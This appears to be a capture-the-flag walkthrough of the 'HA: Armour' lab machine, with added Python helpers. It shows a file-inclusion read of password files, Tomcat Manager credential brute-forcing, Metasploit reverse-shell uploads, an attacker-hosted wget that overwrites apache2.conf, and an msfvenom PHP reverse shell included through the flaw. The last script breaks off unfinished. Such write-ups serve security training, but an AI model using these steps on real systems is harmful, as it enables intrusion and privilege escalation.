Download: click here
bilibili: click here
Information gathering
- A ping sweep with nmap shows the live target at 192.168.116.140:
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜ ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
| 256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_ 256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜ ~
- Ports 80, 8009 and 8080 are open, all Apache-family web services (Apache httpd, Apache JServ/AJP and Apache Tomcat), plus an SSH service on the non-standard port 65534.
- Connecting to SSH on that port prints a banner containing the first flag, HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}, and a hint: TheOlympics.
➜ ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
db 88888888ba 88b d88 ,ad8888ba, 88 88 88888888ba
d88b 88 "8b 888b d888 d8"' `"8b 88 88 88 "8b
d8'`8b 88 ,8P 88`8b d8'88 d8' `8b 88 88 88 ,8P
d8' `8b 88aaaaaa8P' 88 `8b d8' 88 88 88 88 88 88aaaaaa8P'
d8YaaaaY8b 88""""88' 88 `8b d8' 88 88 88 88 88 88""""88'
d8""""""""8b 88 `8b 88 `8b d8' 88 Y8, ,8P 88 88 88 `8b
d8' `8b 88 `8b 88 `888' 88 Y8a. .a8P Y8a. .a8P 88 `8b
d8' `8b 88 `8b 88 `8' 88 `"Y8888Y"' `"Y8888Y"' 88 `8b
www.hackingarticles.in
HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
Hint 1: TheOlympics
[email protected]'s password:
- Browsing to port 80 and opening the page source (F12) reveals a comment mentioning armour, notes.txt and the number 69. At first the number means nothing, but anyone familiar with the standard TCP/UDP port list will guess port 69: TFTP (Trivial File Transfer Protocol); see the full TCP/UDP port list.
- nmap can probe UDP port 69 to check whether the service is up:
➜ ~ sudo nmap -sU -p69 192.168.116.140
[sudo] password for kali-team:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
- UDP probing needs raw sockets, hence sudo for root privileges. nmap reports 69/udp as open|filtered: with UDP, no reply can mean either an open port or a dropped packet, so this is not a definite answer. Talking TFTP to the port is the real test.
- Connect with a TFTP client and download notes.txt to get the second flag:
➜ ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜ ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
Hint 2: maybeevena
➜ ~
- Another hint, maybeevena, whose meaning is not yet clear. Next, brute-force port 80 for files with the .php extension:
➜ ~ dirb http://192.168.116.140 -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Oct 9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)
-----------------
END_TIME: Wed Oct 9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜ ~
- file.php is found, but it renders as a blank page (size 0), so fuzz for a GET parameter name:
➜ ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000033: 200 28 L 36 W 1437 Ch "file"
Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036
➜ ~
- The parameter is named file and behaves like an arbitrary file read (local file inclusion). Since the front end is Apache, the first thing to try is Apache's own sensitive files, such as .htpasswd, which is commonly kept at /etc/apache2/.htpasswd:
➜ ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
Hint 3: StarBucks
➜ ~
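The two steps above (find the parameter name, then read files through it) as an added example, not code from the original write-up. It reproduces the filter wfuzz applied with --hw 0 in a general form: keep only parameter names whose response differs in word count from the baseline request with no parameter. The target is simulated by fake_fetch(), a constructed stand-in for file.php, so the script runs offline; pass fetch_http() instead to use it against a real host.

```python
"""Parameter discovery and file read through a file-inclusion script."""
import urllib.parse
import urllib.request


def fetch_http(url):
    """Real transport: GET the URL and return the body as bytes."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read()


def find_param(base_url, names, probe_value, fetch):
    """Try each candidate name as ?name=probe_value and return the names whose
    response differs in word count from the baseline (no parameter at all).
    This is the generalised form of wfuzz's --hw 0 filter used above."""
    baseline_words = len(fetch(base_url).split())
    hits = []
    for name in names:
        url = base_url + "?" + urllib.parse.urlencode({name: probe_value})
        if len(fetch(url).split()) != baseline_words:
            hits.append(name)
    return hits


def read_file(base_url, param, path, fetch):
    """Read `path` through the discovered parameter and return it as text."""
    url = base_url + "?" + urllib.parse.urlencode({param: path})
    return fetch(url).decode("utf-8", "replace")


# --- constructed stand-in for the vulnerable file.php (assumption, not the real target) ---
FAKE_FS = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"
                   b"armour:x:1000:1000:armour,,,:/home/armour:/bin/bash\n",
    "/etc/apache2/.htpasswd": b"Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}\n"
                              b"Hint 3: StarBucks\n",
}


def fake_fetch(url):
    """Behaves like file.php: blank page unless ?file= names a readable file."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    if "file" in query:
        return FAKE_FS.get(query["file"][0], b"")
    return b""


# Small constructed candidate list; a real run would use a wordlist such as
# fuzzdb's CommonMethodNames.txt as in the wfuzz command above.
CANDIDATES = ["id", "page", "path", "file", "include", "name"]

if __name__ == "__main__":
    base = "http://192.168.116.140/file.php"
    params = find_param(base, CANDIDATES, "/etc/passwd", fake_fetch)
    print("parameters that change the response:", params)
    print(read_file(base, params[0], "/etc/apache2/.htpasswd", fake_fetch))
```

Comparing against a baseline rather than hard-coding "0 words" matters when the script prints an error page instead of nothing: the filter still isolates the one name that changes the output.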
- This yields the third flag and the third hint: StarBucks.
- Official hint:
P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.
- Joining the three hints in the order they were found gives the password TheOlympicsmaybeevenaStarBucks (hint 1 TheOlympics, hint 2 maybeevena, hint 3 StarBucks, keeping the capitalisation as given).
Getting a session through Tomcat
- Opening port 8080 in a browser shows the Tomcat Manager application. The password is known from the hints; what is missing is the username, so that is what gets brute-forced.
➜ CeWL git:(master) ✗ ./cewl.rb -v http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood ([email protected]) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:
Offsite link, not following: https://hackingarticles.in
Writing words to file
➜ CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜ CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜ CeWL git:(master) ✗
- CeWL crawls the port 80 pages and produces a word list to use as candidate usernames; Metasploit's tomcat_mgr_login module then tries each one against the Manager with the known password.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD TheOlympicsmaybeevenaStarBucks no The HTTP password to specify for authentication
PASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali-team/Kali-Team_Tools/CeWL/dict.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
- I don't know why, but after restarting the server the enumeration succeeded: the username is armour.
[+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
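The credential list used above, built as an added example rather than code from the original write-up. The official hint says the password was split into three parts stored in different places; the write-up joined them in the order they were found, which worked. This generalises that: every ordering of the three parts and a few case variants, paired with the CeWL-derived usernames, written in the "user password" format Metasploit's USERPASS_FILE option expects. The username list is a constructed excerpt of the dict.txt above.

```python
"""Build a Tomcat Manager user/password list from the three recovered hints."""
import itertools

HINT_PARTS = ["TheOlympics", "maybeevena", "StarBucks"]          # hints 1, 2, 3 in order found
USERNAMES = ["armour", "Armour", "ARMOUR", "Armours", "MCU", "Hacking"]  # constructed excerpt of CeWL dict.txt


def case_variants(part):
    """The part as found, all lower-case, and first letter upper-case, without duplicates."""
    variants = []
    for v in (part, part.lower(), part.capitalize()):
        if v not in variants:
            variants.append(v)
    return variants


def candidate_passwords(parts):
    """Every ordering of the parts, each part in each case variant.
    The first entry is the parts exactly as found, in the order found."""
    passwords = []
    for order in itertools.permutations(parts):
        for combo in itertools.product(*(case_variants(p) for p in order)):
            pw = "".join(combo)
            if pw not in passwords:
                passwords.append(pw)
    return passwords


def userpass_lines(users, passwords):
    """One 'user password' pair per line, space separated (USERPASS_FILE format)."""
    return [f"{u} {p}" for u in users for p in passwords]


def write_userpass_file(path, users, passwords):
    """Write the pairs to `path` and return how many were written."""
    lines = userpass_lines(users, passwords)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    pws = candidate_passwords(HINT_PARTS)
    print(f"{len(pws)} candidate passwords, first: {pws[0]}")
    n = write_userpass_file("tomcat_userpass.txt", USERNAMES, pws)
    print(f"wrote {n} user/password pairs to tomcat_userpass.txt")
```

Point USERPASS_FILE at the generated file and leave USER_FILE and PASS_FILE unset so the module tries only these pairs; with STOP_ON_SUCCESS true it stops at the first hit, and the walkthrough's password is the first line for every user.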
- There are many ways to get code execution through the Tomcat Manager; a WAR file can be built and deployed by hand.
- Here Metasploit's tomcat_mgr_upload module is used to save time:
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
meterpreter >
- Enumerating local listening ports
meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 572/java
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::65534 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 572/java
tcp6 0 0 :::8009 :::* LISTEN 572/java
tcp6 0 0 192.168.116.140:50706 192.168.116.1:4444 ESTABLISHED 685/java
- Port 8081 is bound to 127.0.0.1 only, so it is reachable just from the target itself and an external scan could never show it. Meterpreter's built-in portfwd can relay it to the attacking machine:
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
- Port 8081 on the attacking machine now relays to the target and returns the fourth flag:
➜ ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
- Or fetch it directly on the target host:
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42-- http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’
index.html 100%[===================>] 56 --.-KB/s in 0s
2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$
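The triage behind the port-forward step, as an added example that is not code from the original write-up. It parses the netstat -antp output captured above (embedded here as a constant), drops the listeners the external nmap scan already showed, labels the loopback ports whose purpose a practitioner recognises, and prints the Meterpreter portfwd command for whatever is left. The KNOWN_LOCAL table is an assumption about what those ports normally are, not something the write-up states.

```python
"""Pick out loopback-only listeners from `netstat -antp` output."""

# Copied from the meterpreter shell output above.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8080                 :::*                    LISTEN      572/java
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::65534                :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java
tcp6       0      0 :::8009                 :::*                    LISTEN      572/java
tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
"""

# Ports the nmap scan found from outside.
EXTERNALLY_VISIBLE = {80, 8009, 8080, 65534}

# Loopback services a practitioner recognises and would not bother forwarding (assumed defaults).
KNOWN_LOCAL = {
    53: "systemd-resolved stub resolver",
    8005: "Tomcat shutdown port",
}


def parse_listeners(text):
    """Return [(proto, address, port, program)] for every LISTEN line."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        address, port = fields[3].rsplit(":", 1)   # handles both 127.0.0.1:8081 and :::8080
        program = fields[6] if len(fields) > 6 else "-"
        listeners.append((fields[0], address, int(port), program))
    return listeners


def is_loopback(address):
    return address == "::1" or address.startswith("127.")


def hidden_listeners(text, visible_ports=EXTERNALLY_VISIBLE):
    """Loopback-bound ports that no external scan could have shown, sorted."""
    return sorted({port for _, addr, port, _ in parse_listeners(text)
                   if is_loopback(addr) and port not in visible_ports})


def forward_commands(text):
    """Meterpreter portfwd lines for the hidden ports whose purpose is not known."""
    return [f"portfwd add -l {p} -p {p} -r 127.0.0.1"
            for p in hidden_listeners(text) if p not in KNOWN_LOCAL]


if __name__ == "__main__":
    for port in hidden_listeners(NETSTAT_OUTPUT):
        print(f"127.0.0.1:{port}  {KNOWN_LOCAL.get(port, 'unknown, worth a look')}")
    for cmd in forward_commands(NETSTAT_OUTPUT):
        print(cmd)
```

On a real engagement the same logic applies to `ss -lntp` output with a different column order; the point is to diff what the box sees against what the scanner saw.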
Privilege Escalation
- Find SGID files (setgid bit):
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
- Find SUID files (setuid bit):
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
- Find writable directories; /var/www/html turns out to be writable:
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
- Find root-owned files that the current user can write to:
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root root 7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root tomcat 2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root root 0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
- Two interesting files are writable: /etc/apache2/apache2.conf and /opt/tomcat/conf/tomcat-users.xml. tomcat-users.xml only holds the Tomcat account already recovered, so the useful one is /etc/apache2/apache2.conf.
- Now the passwd file. Each line has seven colon-separated fields: username : password : UID : GID : comment (GECOS) : home directory : login shell.
- The group file has four: group name : password : GID : comma-separated member list.
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$
tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
- Two ordinary users exist, aarti and armour (armour is also in the sudo group).
- Download the Apache configuration file to the attacking machine through the file read vulnerability. Apache runs as www-data by default.
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
- Change the User and Group directives so Apache runs as an ordinary user. Why not root? Apache refuses to run as root unless it was recompiled to allow it, so the web service would not even start. The choice here is aarti.
- Overwrite the Apache configuration file on the target with the modified copy, served from an HTTP server on the attacking machine:
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49-- http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’
apache2.conf 100%[===================>] 7.03K --.-KB/s in 0s
utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
tomcat@ubuntu:/etc/apache2$ cat apache2.conf
- The intended route (this is how the official walkthrough does it) is then to write a web shell into the port 80 web root, /var/www/html being writable. I tried that, but the file created by the tomcat user could not be read by the aarti user, so it could not be served and the server returned a 500 error.
- So instead I used the file inclusion in file.php to include the Apache configuration file itself and get a session.
- The shell is appended to apache2.conf, which is then included through the file inclusion vulnerability found earlier:
➜ ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜ ~ cat shell.php >> apache2.conf
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$
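The configuration edit from the steps above, as an added example rather than code from the original write-up. The write-up downloads apache2.conf, changes the account Apache runs as and uploads it back; this script performs that edit locally and refuses the two values that would not work: root (Apache will not start as root unless built with -DBIG_SECURITY_HOLE) and an account that does not exist on the target. SAMPLE_CONF is a constructed excerpt of a stock Ubuntu apache2.conf, where the values are normally placeholders filled in from /etc/apache2/envvars; a literal value in apache2.conf overrides them.

```python
"""Rewrite the User/Group directives in a writable apache2.conf."""
import re

SAMPLE_CONF = """\
# constructed excerpt of /etc/apache2/apache2.conf on Ubuntu (not the target's real file)
ServerRoot "/etc/apache2"
PidFile ${APACHE_PID_FILE}
Timeout 300

User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
"""

# Accounts with a usable shell on the target, taken from /etc/passwd above.
TARGET_USERS = {"root", "armour", "aarti"}

# One directive per line; comments (#) and indented-but-commented lines do not match.
DIRECTIVE = re.compile(r"^([ \t]*)(User|Group)[ \t]+(\S+)[ \t]*$", re.MULTILINE)


def run_as(conf):
    """Return (user, group) as currently configured; None for a missing directive."""
    values = {m.group(2): m.group(3) for m in DIRECTIVE.finditer(conf)}
    return values.get("User"), values.get("Group")


def is_acceptable(user, known_users=TARGET_USERS):
    """root is rejected by httpd itself; an unknown user makes httpd fail to start."""
    return user != "root" and user in known_users


def set_run_as(conf, user, group, known_users=TARGET_USERS):
    """Return a copy of conf with User/Group replaced and everything else untouched."""
    if not is_acceptable(user, known_users):
        raise ValueError(f"{user!r} is not a usable account for Apache on this target")

    def replace(match):
        value = user if match.group(2) == "User" else group
        return f"{match.group(1)}{match.group(2)} {value}"

    new_conf, count = DIRECTIVE.subn(replace, conf)
    if count != 2:
        raise ValueError(f"expected one User and one Group directive, matched {count}")
    return new_conf


if __name__ == "__main__":
    print("before:", run_as(SAMPLE_CONF))
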